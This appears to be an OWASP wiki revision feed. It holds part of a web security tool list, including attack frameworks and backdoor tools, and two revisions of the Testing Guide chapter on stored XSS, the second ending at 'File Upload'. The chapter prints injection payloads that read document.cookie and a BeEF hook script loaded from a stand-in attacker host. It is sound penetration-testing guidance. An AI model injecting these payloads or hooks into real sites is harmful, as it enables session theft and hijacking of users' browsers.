Cookies Explorer - http://www.dutchduck.com/Features/Cookies.aspx 
Cookie Safe - https://addons.mozilla.org/de/firefox/addon/2497/ 

==Fuzzer==
===Browser-based security fuzzing / checking===
Zalewski's MangleMe - http://freecode.com/projects/mangleme tool see here http://lcamtuf.coredump.cx/soft/mangleme.tgz ([http://lcamtuf.coredump.cx/mangleme/mangle.cgi mangle.cgi dead link]) 
hdm's tools: Hamachi, CSSDIE, DOM-Hanoi, AxMan - http://metasploit.com/users/hdm/tools/ 
Peach Fuzzer Framework - http://peachfuzzer.com/ ([http://peachfuzz.sourceforge.net old link])/ 
TagBruteForcer - http://research.eeye.com/html/tools/RT20060801-3.html 
PROTOS Test-Suite: c05-http-reply - http://www.ee.oulu.fi/research/ouspg/protos/testing/c05/http-reply/index.html 
COMRaider - https://github.com/dzzie/COMRaider ([http://labs.idefense.com dead link]) 
BrowserCheck - http://www.heise-security.co.uk/services/browsercheck/ 
Stealing information using DNS pinning demo - http://www.jumperz.net/index.php?i=2&a=1&b=7 
Javascript Website Login Checker - http://ha.ckers.org/weird/javascript-website-login-checker.html 
Mozilla Activex - http://www.adamlock.com/mozilla/ ([http://www.iol.ie/~locka/mozilla/mozilla.htm old link]) 
Mr. T (Master Recon Tool, includes Read Firefox Settings PoC) - http://ha.ckers.org/mr-t/ 
Test your installation of Java software - http://java.com/en/download/installed.jsp?detect=jre&try=1 
WebPageFingerprint - Light-weight Greasemonkey Fuzzer - http://userscripts.org/scripts/show/30285 

===== dead, vanished links (March/2012) =====
bcheck - http://bcheck.scanit.be/bcheck/ 
Cross-browser Exploit Tests - http://www.jungsonnstudios.com/cool.php 
Jungsonn's Black Dragon Project - http://blackdragon.jungsonnstudios.com/ 
Vulnerable Adobe Plugin Detection For UXSS PoC - http://www.0x000000.com/?i=324 
About Flash: is your flash up-to-date? - http://www.macromedia.com/software/flash/about/ 
Stop-Phishing: Projects page - http://www.indiana.edu/~phishing/?projects 
LinkScanner - <nowiki>http://linkscanner.explabs.com/linkscanner/default.asp</nowiki> (seems to be a vendor link now) 

===Application and protocol fuzzing (random instead of targeted)===
Sulley - http://fuzzing.org/ 
taof: The Art of Fuzzing - http://sourceforge.net/projects/taof/ 
zzuf: multipurpose fuzzer - http://sam.zoy.org/zzuf/ 
autodafé: an act of software torture - http://autodafe.sourceforge.net/ 

===== dead, vanished links (March/2012) =====
EFS and GPF: Evolutionary Fuzzing System - http://www.appliedsec.com/resources.html 

==Ajax and XHR scanning==
Sahi - http://sahi.co.in/ 
scRUBYt - http://scrubyt.org/ 
jQuery - http://jquery.com/ 
jquery-include - http://www.gnucitizen.org/projects/jquery-include 
Sprajax - http://www.denimgroup.com/sprajax.html 
Watir - http://wtr.rubyforge.org/ 
Watij - http://watij.com/ 
Watin - http://watin.sourceforge.net/ 
RBNarcissus - http://idontsmoke.co.uk/2005/rbnarcissus/ 
SpiderTest (Spider Fuzz plugin) - http://blog.caboo.se/articles/2007/2/21/the-fabulous-spider-fuzz-plugin 
Javascript Inline Debugger (jasildbg) - http://jasildbg.googlepages.com/ 
Firebug Lite - http://www.getfirebug.com/lite.html 
firewaitr - http://code.google.com/p/firewatir/ 

==SQL injection scanning==
0x90.org: home of Absinthe, Mezcal, etc - http://0x90.org/releases.php 
SQLiX - http://www.owasp.org/index.php/Category:OWASP_SQLiX_Project 
sqlninja: a SQL Server injection and takover tool - http://sqlninja.sourceforge.net/ 
JustinClarke's SQL Brute - http://www.justinclarke.com/archives/2006/03/sqlbrute.html 
BobCat - http://www.northern-monkee.co.uk/projects/bobcat/bobcat.html 
sqlmap - http://sqlmap.sourceforge.net/ 
Scully: SQL Server DB Front-End and Brute-Forcer - http://www.sensepost.com/research/scully/ 
FG-Injector - http://www.flowgate.net/?lang=en&seccion=herramientas 
PRIAMOS - http://www.priamos-project.com/ 

==Web services enumeration / scanning / fuzzing==
WebServiceStudio2.0 - http://www.codeplex.com/WebserviceStudio 
Net-square: wsChess - http://net-square.com/wschess/index.shtml 
WSFuzzer - http://www.owasp.org/index.php/Category:OWASP_WSFuzzer_Project 
SIFT: web method search tool - http://www.sift.com.au/73/171/sift-web-method-search-tool.htm 
iSecPartners: WSMap, WSBang, etc - http://www.isecpartners.com/tools.html 

==3rd party services that aid in web application security assessment==
Netcraft - http://www.netcraft.net 
AboutURL - http://www.abouturl.com/ 
The Scrutinizer - http://www.scrutinizethis.com/ 
net.toolkit - http://clez.net/ 
ServerSniff - http://www.serversniff.net/ 
Online Microsoft script decoder - http://www.greymagic.com/security/tools/decoder/ 
Webmaster-Toolkit - http://www.webmaster-toolkit.com/ 
myIPNeighbbors, et al - http://digg.com/security/MyIPNeighbors_Find_Out_Who_Else_is_Hosted_on_Your_Site_s_IP_Address 
PHP charset encoding - http://h4k.in/encoding 
data: URL testcases - http://h4k.in/dataurl 

=Server side stuff=
==PHP static analysis and file inclusion scanning==
Pixy: Open source flow based discovery of XSS and SQLi - http://pixybox.seclab.tuwien.ac.at/pixy/ 
PHP-SAT.org: Static analysis for PHP - http://www.program-transformation.org/PHP/ 
Unl0ck Research Team: tool for searching in google for include bugs - http://unl0ck.net/tools.php 
FIS: File Inclusion Scanner - http://www.segfault.gr/index.php?cat_id=3&cont_id=25 
PHPSecAudit - http://developer.spikesource.com/projects/phpsecaudit 

==PHP Defensive Tools==
PHPInfoSec - Check phpinfo configuration for security - http://phpsec.org/projects/phpsecinfo/ 
Greasemonkey Replacement can be found at http://yehg.net/lab/#tools.greasemonkey 
Php-Brute-Force-Attack Detector - Detect your web servers being scanned by brute force tools - http://yehg.net/lab/pr0js/files.php/php_brute_force_detect.zip 
PHP-Login-Info-Checker (Strictly enforce admins/users to select stronger passwords via url loginfo_checker.php?testlic) - http://yehg.net/lab/pr0js/files.php/loginfo_checkerv0.1.zip, http://yehg.net/lab/pr0js/files.php/phploginfo_checker_demo.zip 
php-DDOS-Shield (prevent idiot distributed bots which discontinue their flooding attacks by identifying HTTP 503 header code) - http://code.google.com/p/ddos-shield/ 
PHPMySpamFIGHTER - http://yehg.net/lab/pr0js/files.php/phpmyspamfighter.zip, http://yehg.net/lab/pr0js/files.php/phpMySpamFighter_demo.rar 

==Web Application Firewall (WAF) and Intrusion Detection (APIDS) rules and resources==
APIDS on Wikipedia - http://en.wikipedia.org/wiki/APIDS 
PHP Intrusion Detection System (PHP-IDS) - http://php-ids.org/ http://code.google.com/p/phpids/ 
dotnetids - http://code.google.com/p/dotnetids/ 
Secure Science InterScout - http://www.securescience.com/home/newsandevents/news/interscout1.0.html 
Remo: whitelist rule editor for mod_security - http://remo.netnea.com/ 
GotRoot: ModSecuirty rules - http://www.gotroot.com/tiki-index.php?page=mod_security+rules 
The Web Security Gateway (WSGW) - http://wsgw.sourceforge.net/ 
mod_security rules generator - http://noeljackson.com/tools/modsecurity/ 
Mod_Anti_Tamper - http://www.wisec.it/projects.php?id=3 
[TGZ] Automatic Rules Generation for Mod_Security - http://www.wisec.it/rdr.php?fn=/Projects/Rule-o-matic.tgz 
AQTRONIX WebKnight - http://www.aqtronix.com/?PageID=99 
Akismet: blog spam defense - http://akismet.com/ 
Samoa: Formal tools for securing web services - http://research.microsoft.com/projects/samoa/ 

=Code=
==Web application non-specific static source-code analysis==
Pixy: a static analysis tool for detecting XSS vulnerabilities - http://www.seclab.tuwien.ac.at/projects/pixy/ 
Brixoft.Net: Source Edit - http://www.brixoft.net/prodinfo.asp?id=1 
Security compass web application auditing tools (SWAAT) - http://www.owasp.org/index.php/Category:OWASP_SWAAT_Project 
An even more complete list here - http://www.cs.cmu.edu/~aldrich/courses/654/tools/ 
A nice list that claims some demos available - http://www.cs.cmu.edu/~aldrich/courses/413/tools.html 
A smaller, but also good list - http://spinroot.com/static/ 
Yasca: A highly extensible source code analysis framework; incorporates several analysis tools into one package. http://www.yasca.org/ 

==Static analysis for C/C++ (CGI, ISAPI, etc) in web applications==
RATS - http://www.securesoftware.com/resources/download_rats.html 
ITS4 - http://www.cigital.com/its4/ 
FlawFinder - http://www.dwheeler.com/flawfinder/ 
Splint - http://www.splint.org/ 
Uno - http://spinroot.com/uno/ 
BOON (Buffer Overrun detectiON) - http://www.cs.berkeley.edu/~daw/boon/ http://boon.sourceforge.net 
Valgrind - http://www.valgrind.org/ 

==Java static analysis, security frameworks, and web application security tools==
LAPSE - http://suif.stanford.edu/~livshits/work/lapse/ 
CodePro Analytix - http://code.google.com/webtoolkit/tools/codepro/doc/index.html 
HDIV Struts - http://hdiv.org/ 
Orizon - http://sourceforge.net/projects/orizon/ 
FindBugs: Find bugs in Java programs - http://findbugs.sourceforge.net/ 
PMD - http://pmd.sourceforge.net/ 
CUTE: A Concolic Unit Testing Engine for C and Java - http://osl.cs.uiuc.edu/~ksen/cute/ 
EMMA - http://emma.sourceforge.net/ 
JLint - http://jlint.sourceforge.net/ 
Java PathFinder - http://javapathfinder.sourceforge.net/ 
Fujaba: Move between UML and Java source code - http://wwwcs.uni-paderborn.de/cs/fujaba/ 
Checkstyle - http://checkstyle.sourceforge.net/ 
Cookie Revolver Security Framework - http://sourceforge.net/projects/cookie-revolver 
tinapoc - http://sourceforge.net/projects/tinapoc 
jarsigner - http://java.sun.com/j2se/1.5.0/docs/tooldocs/solaris/jarsigner.html 
Solex - http://solex.sourceforge.net/ 
Java Explorer - http://metal.hurlant.com/jexplore/ 
HTTPClient - http://www.innovation.ch/java/HTTPClient/ 
another HttpClient - http://jakarta.apache.org/commons/httpclient/ 
a list of code coverage and analysis tools for Java - http://mythinkpond.blogspot.com/2007/06/java-foss-freeopen-source-software.html 

==Microsoft .NET static analysis and security framework tools, mostly for ASP.NET and ASP.NET AJAX, but also C# and VB.NET==
* Visual Studio 2008 Code Analysis, available in:
** VSTS 2008 Development Edition (http://msdn.microsoft.com/vsts2008/products/bb933752.aspx) and
** VSTS 2008 Team Suite (http://msdn.microsoft.com/vsts2008/products/bb933735.aspx)
* Visual Studio 2005 Code Analyzer, available in:
** Visual Studio 2005 Team Edition for Software Developers (http://msdn.microsoft.com/en-us/vstudio/aa718806.aspx)
** Visual Studio 2005 Team Suite (http://msdn.microsoft.com/en-us/vstudio/aa718806.aspx)
* Web Development Helper - http://www.nikhilk.net/Project.WebDevHelper.aspx
* FxCop:
** (blog) http://blogs.msdn.com/fxcop/
** (download) http://code.msdn.microsoft.com/codeanalysis
* Microsoft internal tools you can't have yet:
** http://www.microsoft.com/windows/cse/pa_projects.mspx
** http://research.microsoft.com/Pex/
** http://www.owasp.org/images/5/5b/OWASP_IL_7_FuzzGuru.pdf 

=Database security assessment=
Scuba by Imperva Database Vulnerability Scanner - http://www.imperva.com/scuba/ 

=Threat modeling=
Microsoft Threat Analysis and Modeling Tool v2.1 (TAM) - http://www.microsoft.com/downloads/details.aspx?FamilyID=59888078-9daf-4e96-b7d1-944703479451&displaylang=en 
Amenaza: Attack Tree Modeling (SecurITree) - http://www.amenaza.com/software.php 
Octotrike - http://www.octotrike.org/ 

=Misc=

==RSS extensions and caching==
rss-cache - http://www.dubfire.net/chris/projects/rss-cache/ 

==Blackhat SEO and maybe some whitehat SEO==
SearchStatus (Firefox Add-on) - http://www.quirk.biz/searchstatus/ 
SEO for Firefox (Firefox Add-on) - http://tools.seobook.com/firefox/seo-for-firefox.html 
SEOQuake (Firefox Add-on) - http://www.seoquake.com/ 
Analytics seo - http://www.analyticsseo.com/ 

==Web application security malware, backdoors, and evil code==
Jikto - http://busin3ss.name/jikto-in-the-wild/ 
XSS Shell - http://ferruh.mavituna.com/article/?1338 
XSS-Proxy - http://xss-proxy.sourceforge.net 
AttackAPI - http://www.gnucitizen.org/projects/attackapi/ 
FFsniFF - http://azurit.elbiahosting.sk/ffsniff/ 
HoneyBlog's web-based junkyard - http://honeyblog.org/junkyard/web-based/ 
BeEF - http://www.beefproject.com 
Firefox Extension Scanner (FEX) - http://www.gnucitizen.org/projects/fex/ 
What is my IP address? - http://reglos.de/myaddress/ 
xRumer: blogspam automation tool - http://www.botmaster.net/movies/XFull.htm 
SpyJax - http://www.merchantos.com/makebeta/tools/spyjax/ 
Greasecarnaval - http://www.gnucitizen.org/projects/greasecarnaval 
Technika - http://www.gnucitizen.org/projects/technika/ 
Load-AttackAPI bookmarklet - http://www.gnucitizen.org/projects/load-attackapi-bookmarklet 
MD's Projects: JS port scanner, pinger, backdoors, etc - http://michaeldaw.org/my-projects/ 

==Honeyclients, Web Application, and Web Proxy honeypots==
Honeyclient Project: an open-source honeyclient - http://www.honeyclient.org/trac/ 
HoneyC: the low-interaction honeyclient - http://honeyc.sourceforge.net/ 
Capture: a high-interaction honeyclient - http://capture-hpc.sourceforge.net/ 
Google Hack Honeypot - http://ghh.sourceforge.net/ 
PHP.Hop - PHP Honeynet Project - http://www.rstack.org/phphop/ 
SpyBye - http://www.monkey.org/~provos/spybye/ 
Honeytokens - http://www.securityfocus.com/infocus/1713 

=Browser Privacy/ Defenses=

==Browser Defenses==
Adblock Plus (Firefox Add-on) - https://addons.mozilla.org/en-US/firefox/addon/adblock-plus/ 
NoScript (Firefox Add-on) - http://www.noscript.net/ 
DieHard - http://www.diehard-software.org/ 
LocalRodeo (Firefox Add-on) - http://databasement.net/labs/localrodeo/ 
NoMoXSS - http://www.seclab.tuwien.ac.at/projects/jstaint/ 
FlashBlock (Firefox Add-on) - http://flashblock.mozdev.org/ 
FormFox (Firefox Add-on) - https://addons.mozilla.org/en-US/firefox/addon/1579/ 
SafeCache (Firefox Add-on) - http://www.safecache.com/ 
SafeHistory (Firefox Add-on) - http://www.safehistory.com/ 
PrefBar (Firefox Add-on) - http://prefbar.mozdev.org/ 
All-in-One Sidebar (Firefox Add-on) - https://addons.mozilla.org/en-US/firefox/addon/1027/ 
Update Notified (Firefox Add-on) - https://addons.mozilla.org/en-US/firefox/addon/2098/ 
FireKeeper - http://firekeeper.mozdev.org/ 
Greasemonkey: XSS Malware Script Detector - http://yehg.net/lab/#tools.greasemonkey 

==Browser Privacy==
BetterPrivacy (Firefox Add-on) - https://addons.mozilla.org/en-US/firefox/addon/betterprivacy/ 
TrackMeNot (Firefox Add-on) - https://addons.mozilla.org/en-US/firefox/addon/trackmenot/ 
Privacy Bird - http://www.privacybird.com/ 
HTTPS Everywhere - https://www.eff.org/https-everywhere

Testing for Stored Cross site scripting (OTG-INPVAL-002)

2013-01-09T12:17:27Z

Xntrik: Updated the BeEF demo

{{Template:OWASP Testing Guide v4}}

== Brief Summary ==
Stored [[Cross-site Scripting (XSS)]] is the most dangerous type of Cross Site Scripting. Web applications that allow users to store data are potentially exposed to this type of attack. This chapter illustrates examples of stored cross site scripting injection and related exploitation scenarios.

== Description of the Issue ==
Stored XSS occurs when a web application gathers input from a user which might be malicious, and then stores that input in a data store for later use. The input that is stored is not correctly filtered. As a consequence, the malicious data will appear to be part of the web site and run within the user’s browser under the privileges of the web application. Since this vulnerability typically involves at least two requests to the application, this may also called second-order XSS.

This vulnerability can be used to conduct a number of browser-based attacks including:

* Hijacking another user's browser
* Capturing sensitive information viewed by application users
* Pseudo defacement of the application
* Port scanning of internal hosts ("internal" in relation to the users of the web application)
* Directed delivery of browser-based exploits
* Other malicious activities

Stored XSS does not need a malicious link to be exploited. A successful exploitation occurs when a user visits a page with a stored XSS. The following phases relate to a typical stored XSS attack scenario:

* Attacker stores malicious code into the vulnerable page
* User authenticates in the application
* User visits vulnerable page
* Malicious code is executed by the user's browser

 This type of attack can also be exploited with browser exploitation frameworks such as [http://www.beefproject.com BeEF], [http://xss-proxy.sourceforge.net/ XSS Proxy] and [http://www.gnucitizen.org/projects/backframe/ Backframe]. These frameworks allow for complex JavaScript exploit development.

Stored XSS is particularly dangerous in application areas where users with high privileges have access. When the administrator visits the vulnerable page, the attack is automatically executed by their browser. This might expose sensitive information such as session authorization tokens.

== Black Box testing and example ==

The process for identifying stored XSS vulnerabilities is similar to the process described during the [[Testing for Reflected Cross site scripting (OWASP-DV-001)|testing for reflected XSS]].

'''Input Forms'''

The first step is to identify all points where user input is stored into the back-end and then displayed by the application. Typical examples of stored user input can be found in:

* User/Profiles page: the application allows the user to edit/change profile details such as first name, last name, nickname, avatar, picture, address, etc.
* Shopping cart: the application allows the user to store items into the shopping cart which can then be reviewed later
* File Manager: application that allows upload of files
* Application settings/preferences: application that allows the user to set preferences
* Forum/Message board: application that permits exchange of posts among users
* Blog: if the blog application permits to users submitting comments
* Log: if the application stores some users input into logs.

'''Analyze HTML code'''

Input stored by the application is normally used in HTML tags, but it can also be found as part of JavaScript content. At this stage, it is fundamental to understand if input is stored and how it is positioned in the context of the page. Differently from reflected XSS, the pen-tester should also investigate any out-of-band channels through which the application receives and stores users input.
 
Note: All areas of the application accessible by administrators should be tested to identify the presence of any data submitted by users.

Example: Email stored data in index2.php

[[Image:Stored_input_example.jpg]]

The HTML code of index2.php where the email value is located:

<pre>
<input class="inputbox" type="text" name="email" size="40" value="aaa@aa.com" />
</pre>

In this case, the pen-tester needs to find a way to inject code outside the <input> tag as below:

<pre>
<input class="inputbox" type="text" name="email" size="40" value="aaa@aa.com"> MALICIOUS CODE <!-- />
</pre>

'''Testing for Stored XSS'''

This involves testing the input validation/filtering controls of the application. Basic injection examples in this case:

<pre>aaa@aa.com"><script>alert(document.cookie)</script></pre>
<pre>aaa@aa.com%22%3E%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E</pre>

Ensure the input is submitted through the application. This normally involves disabling JavaScript if client-side security controls are implemented or modifying the HTTP request with a web proxy such as [[OWASP WebScarab Project|WebScarab]]. It is also important to test the same injection with both HTTP GET and POST requests. The above injection results in a popup window containing the cookie values.

'''Result Expected''':

[[Image:Stored_xss_example.jpg]]

The HTML code following the injection:

<pre><input class="inputbox" type="text" name="email" size="40" value="aaa@aa.com"><script>alert(document.cookie)</script></pre>
The input is stored and the XSS payload is executed by the browser when reloading the page. 
If the input is escaped by the application, testers should test the application for XSS filters. For instance, if the string "SCRIPT" is replaced by a space or by a NULL character then this could be a potential sign of XSS filtering in action. Many techniques exist in order to evade input filters (see [[Testing for Reflected Cross site scripting (OWASP-DV-001)|testing for reflected XSS]] chapter). It is strongly recommended that testers refer to [[XSS Filter Evasion Cheat Sheet|XSS Filter Evasion]] , [http://ha.ckers.org/xss.html RSnake] and [https://h4k.in/encoding/ Mario] XSS Cheat pages which provide an extensive list of XSS attacks and filtering bypasses. Refer to the whitepapers/tools section for more detailed information.

'''Leverage Stored XSS with BeEF'''

Stored XSS can be exploited by advanced JavaScript exploitation frameworks such as [http://www.beefproject.com BeEF], [http://xss-proxy.sourceforge.net/ XSS Proxy] and [http://www.gnucitizen.org/projects/backframe/ Backframe]. Let’s see what a typical BeEF exploitation scenario involves:

* Injecting a JavaScript hook which communicates to the attacker's browser exploitation framework (BeEF)
* Waiting for the application user to view the vulnerable page where the stored input is displayed
* Control the application user’s browser via the BeEF console

The JavaScript hook can be injected by exploiting the XSS vulnerability in the web application.

Example: BeEF Injection in index2.php:

<pre>aaa@aa.com”><script src=http://attackersite/hook.js></script></pre>

When the user loads the page index2.php, the script hook.js is executed by the browser. It is then possible to access cookies, user screenshot, user clipboard, and launch complex XSS attacks.

'''Result Expected'''

[[Image:RubyBeef.png]]

This attack is particularly effective in vulnerable pages that are viewed by many users with different privileges.

'''File Upload'''

If the web application allows file upload, it is important to check if it is possible to upload HTML content. For instance, if HTML or TXT files are allowed, XSS payload can be injected in the file uploaded. The pen-tester should also verify if the file upload allows setting arbitrary MIME types.

Consider the following HTTP POST request for file upload:

<pre>
POST /fileupload.aspx HTTP/1.1
[…]

Content-Disposition: form-data; name="uploadfile1"; filename="C:\Documents and Settings\test\Desktop\test.txt"
Content-Type: text/plain

test
</pre>

This design flaw can be exploited in browser MIME mishandling attacks. For instance, innocuous-looking files like JPG and GIF can contain an XSS payload that is executed when they are loaded by the browser. This is possible when the MIME type for an image such as image/gif can instead be set to text/html. In this case the file will be treated by the client browser as HTML.

HTTP POST Request forged:
<pre>
Content-Disposition: form-data; name="uploadfile1"; filename="C:\Documents and Settings\test\Desktop\test.gif"
Content-Type: text/html

<script>alert(document.cookie)</script>
</pre>

Also consider that Internet Explorer does not handle MIME types in the same way as Mozilla Firefox or other browsers do. For instance, Internet Explorer handles TXT files with HTML content as HTML content. For further information about MIME handling, refer to the whitepapers section at the bottom of this chapter.

== Gray Box testing and example ==
Gray Box testing is similar to Black box testing. In gray box testing, the pen-tester has partial knowledge of the application. In this case, information regarding user input, input validation controls, and data storage might be known by the pen-tester.

Depending on the information available, it is normally recommended that testers check how user input is processed by the application and then stored into the back-end system. The following steps are recommended:

* Use front-end application and enter input with special/invalid characters
* Analyze application response(s)
* Identify presence of input validation controls
* Access back-end system and check if input is stored and how it is stored
* Analyze source code and understand how stored input is rendered by the application

If source code is available (White Box), all variables used in input forms should be analyzed.

In particular, programming languages such as PHP, ASP, and JSP make use of predefined variables/functions to store input from HTTP GET and POST requests.

The following table summarizes some special variables and functions to look at when analyzing source code:

<blockquote style="background: white; border: 1px solid rgb(153, 153, 153); padding: 1em;">
{| class="wikitable" style="margin: 1em auto 1em auto"
| '''PHP''' || '''ASP''' || '''JSP'''
|-
|
* $_GET - HTTP GET variables
* $_POST - HTTP POST variables
* $_REQUEST – http POST, GET and COOKIE variables
* $_FILES - HTTP File Upload variables
||
* Request.QueryString - HTTP GET
* Request.Form - HTTP POST
* Server.CreateObject - used to upload files
||
* doGet, doPost servlets - HTTP GET and POST
* request.getParameter - HTTP GET/POST variables
|}
</blockquote>

Note: The table above is only a summary of the most important parameters but, all user input parameters should be investigated.

== References ==
'''OWASP Resources''' 
*[[XSS Filter Evasion Cheat Sheet]]

'''Books''' 
* Joel Scambray, Mike Shema, Caleb Sima - "Hacking Exposed Web Applications", Second Edition, McGraw-Hill, 2006 - ISBN 0-07-226229-0
* Dafydd Stuttard, Marcus Pinto - "The Web Application's Handbook - Discovering and Exploiting Security Flaws", 2008, Wiley, ISBN 978-0-470-17077-9
* Jeremiah Grossman, Robert "RSnake" Hansen, Petko "pdp" D. Petkov, Anton Rager, Seth Fogie - "Cross Site Scripting Attacks: XSS Exploits and Defense", 2007, Syngress, ISBN-10: 1-59749-154-3

'''Whitepapers''' 
* RSnake: "XSS (Cross Site Scripting) Cheat Sheet" - http://ha.ckers.org/xss.html

* CERT: "CERT Advisory CA-2000-02 Malicious HTML Tags Embedded in Client Web Requests" - http://www.cert.org/advisories/CA-2000-02.html

* Amit Klein: "Cross-site Scripting Explained" - http://courses.csail.mit.edu/6.857/2009/handouts/css-explained.pdf

* Gunter Ollmann: "HTML Code Injection and Cross-site Scripting" - http://www.technicalinfo.net/papers/CSS.html

* CGISecurity.com: "The Cross Site Scripting FAQ" - http://www.cgisecurity.com/xss-faq.html

* Blake Frantz: "Flirting with MIME Types: A Browser's Perspective" - http://www.leviathansecurity.com/pdf/Flirting%20with%20MIME%20Types.pdf

'''Tools''' 
* '''[[OWASP CAL9000 Project|OWASP CAL9000]]'''
CAL9000 includes a sortable implementation of RSnake's XSS Attacks, Character Encoder/Decoder, HTTP Request Generator and Response Evaluator, Testing Checklist, Automated Attack Editor and much more.

* '''PHP Charset Encoder(PCE)''' - http://h4k.in/encoding
PCE helps you encode arbitrary texts to and from 65 kinds of character sets that you can use in your customized payloads.

* '''Hackvertor''' - http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php
Hackvertor is an online tool which allows many types of encoding and obfuscation of JavaScript (or any string input).

* '''BeEF''' - http://www.beefproject.com
BeEF is the browser exploitation framework. A professional tool to demonstrate the real-time impact of browser vulnerabilities.

* '''XSS-Proxy''' - http://xss-proxy.sourceforge.net/
XSS-Proxy is an advanced Cross-Site-Scripting (XSS) attack tool.

* '''Backframe''' - http://www.gnucitizen.org/projects/backframe/
Backframe is a full-featured attack console for exploiting WEB browsers, WEB users, and WEB applications.

* '''[[OWASP WebScarab Project|WebScarab]]'''
WebScarab is a framework for analyzing applications that communicate using the HTTP and HTTPS protocols.

* '''Burp''' - http://portswigger.net/burp/
Burp Proxy is an interactive HTTP/S proxy server for attacking and testing web applications.

* '''XSS Assistant''' - http://www.greasespot.net/
Greasemonkey script that allow users to easily test any web application for cross-site-scripting flaws.

* '''OWASP Zed Attack Proxy (ZAP)''' - [[OWASP_Zed_Attack_Proxy_Project]]
ZAP is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications. It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing. ZAP provides automated scanners as well as a set of tools that allow you to find security vulnerabilities manually.

File:RubyBeef.png

2013-01-09T12:15:13Z

Xntrik: Screenshot of the Ruby BeEF User Interface

Screenshot of the Ruby BeEF User Interface

Testing for Stored Cross site scripting (OTG-INPVAL-002)

2013-01-09T12:12:09Z

Xntrik: /* References */

{{Template:OWASP Testing Guide v4}}

== Brief Summary ==
Stored [[Cross-site Scripting (XSS)]] is the most dangerous type of Cross Site Scripting. Web applications that allow users to store data are potentially exposed to this type of attack. This chapter illustrates examples of stored cross site scripting injection and related exploitation scenarios.

== Description of the Issue ==
Stored XSS occurs when a web application gathers input from a user which might be malicious, and then stores that input in a data store for later use. The input that is stored is not correctly filtered. As a consequence, the malicious data will appear to be part of the web site and run within the user’s browser under the privileges of the web application. Since this vulnerability typically involves at least two requests to the application, this may also called second-order XSS.

This vulnerability can be used to conduct a number of browser-based attacks including:

* Hijacking another user's browser
* Capturing sensitive information viewed by application users
* Pseudo defacement of the application
* Port scanning of internal hosts ("internal" in relation to the users of the web application)
* Directed delivery of browser-based exploits
* Other malicious activities

Stored XSS does not need a malicious link to be exploited. A successful exploitation occurs when a user visits a page with a stored XSS. The following phases relate to a typical stored XSS attack scenario:

* Attacker stores malicious code into the vulnerable page
* User authenticates in the application
* User visits vulnerable page
* Malicious code is executed by the user's browser

 This type of attack can also be exploited with browser exploitation frameworks such as [http://www.beefproject.com BeEF], [http://xss-proxy.sourceforge.net/ XSS Proxy] and [http://www.gnucitizen.org/projects/backframe/ Backframe]. These frameworks allow for complex JavaScript exploit development.

Stored XSS is particularly dangerous in application areas where users with high privileges have access. When the administrator visits the vulnerable page, the attack is automatically executed by their browser. This might expose sensitive information such as session authorization tokens.

== Black Box testing and example ==

The process for identifying stored XSS vulnerabilities is similar to the process described during the [[Testing for Reflected Cross site scripting (OWASP-DV-001)|testing for reflected XSS]].

'''Input Forms'''

The first step is to identify all points where user input is stored into the back-end and then displayed by the application. Typical examples of stored user input can be found in:

* User/Profiles page: the application allows the user to edit/change profile details such as first name, last name, nickname, avatar, picture, address, etc.
* Shopping cart: the application allows the user to store items into the shopping cart which can then be reviewed later
* File Manager: application that allows upload of files
* Application settings/preferences: application that allows the user to set preferences
* Forum/Message board: application that permits exchange of posts among users
* Blog: if the blog application permits to users submitting comments
* Log: if the application stores some users input into logs.

'''Analyze HTML code'''

Input stored by the application is normally used in HTML tags, but it can also be found as part of JavaScript content. At this stage, it is fundamental to understand if input is stored and how it is positioned in the context of the page. Differently from reflected XSS, the pen-tester should also investigate any out-of-band channels through which the application receives and stores users input.
 
Note: All areas of the application accessible by administrators should be tested to identify the presence of any data submitted by users.

Example: Email stored data in index2.php

[[Image:Stored_input_example.jpg]]

The HTML code of index2.php where the email value is located:

<pre>
<input class="inputbox" type="text" name="email" size="40" value="aaa@aa.com" />
</pre>

In this case, the pen-tester needs to find a way to inject code outside the <input> tag as below:

<pre>
<input class="inputbox" type="text" name="email" size="40" value="aaa@aa.com"> MALICIOUS CODE <!-- />
</pre>

'''Testing for Stored XSS'''

This involves testing the input validation/filtering controls of the application. Basic injection examples in this case:

<pre>aaa@aa.com"><script>alert(document.cookie)</script></pre>
<pre>aaa@aa.com%22%3E%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E</pre>

Ensure the input is submitted through the application. This normally involves disabling JavaScript if client-side security controls are implemented or modifying the HTTP request with a web proxy such as [[OWASP WebScarab Project|WebScarab]]. It is also important to test the same injection with both HTTP GET and POST requests. The above injection results in a popup window containing the cookie values.

'''Result Expected''':

[[Image:Stored_xss_example.jpg]]

The HTML code following the injection:

<pre><input class="inputbox" type="text" name="email" size="40" value="aaa@aa.com"><script>alert(document.cookie)</script></pre>
The input is stored and the XSS payload is executed by the browser when reloading the page. 
If the input is escaped by the application, testers should test the application for XSS filters. For instance, if the string "SCRIPT" is replaced by a space or by a NULL character then this could be a potential sign of XSS filtering in action. Many techniques exist in order to evade input filters (see [[Testing for Reflected Cross site scripting (OWASP-DV-001)|testing for reflected XSS]] chapter). It is strongly recommended that testers refer to [[XSS Filter Evasion Cheat Sheet|XSS Filter Evasion]] , [http://ha.ckers.org/xss.html RSnake] and [https://h4k.in/encoding/ Mario] XSS Cheat pages which provide an extensive list of XSS attacks and filtering bypasses. Refer to the whitepapers/tools section for more detailed information.

'''Leverage Stored XSS with BeEF'''

Stored XSS can be exploited by advanced JavaScript exploitation frameworks such as [http://www.beefproject.com BeEF], [http://xss-proxy.sourceforge.net/ XSS Proxy] and [http://www.gnucitizen.org/projects/backframe/ Backframe]. Let’s see what a typical BeEF exploitation scenario involves:

* Injecting a JavaScript hook which communicates to the attacker's browser exploitation framework (BeEF)
* Waiting for the application user to view the vulnerable page where the stored input is displayed
* Control the application user’s browser via the BeEF console

The JavaScript hook can be injected by exploiting the XSS vulnerability in the web application.

Example: BeEF Injection in index2.php:

<pre>aaa@aa.com”><script src=http://attackersite/beef/hook/beefmagic.js.php></script></pre>

When the user loads the page index2.php, the script beefmagic.js.php is executed by the browser. It is then possible to access cookies, user screenshot, user clipboard, and launch complex XSS attacks.

'''Result Expected'''

[[Image:BeEF_in_action.jpg]]

This attack is particularly effective in vulnerable pages that are viewed by many users with different privileges.

'''File Upload'''

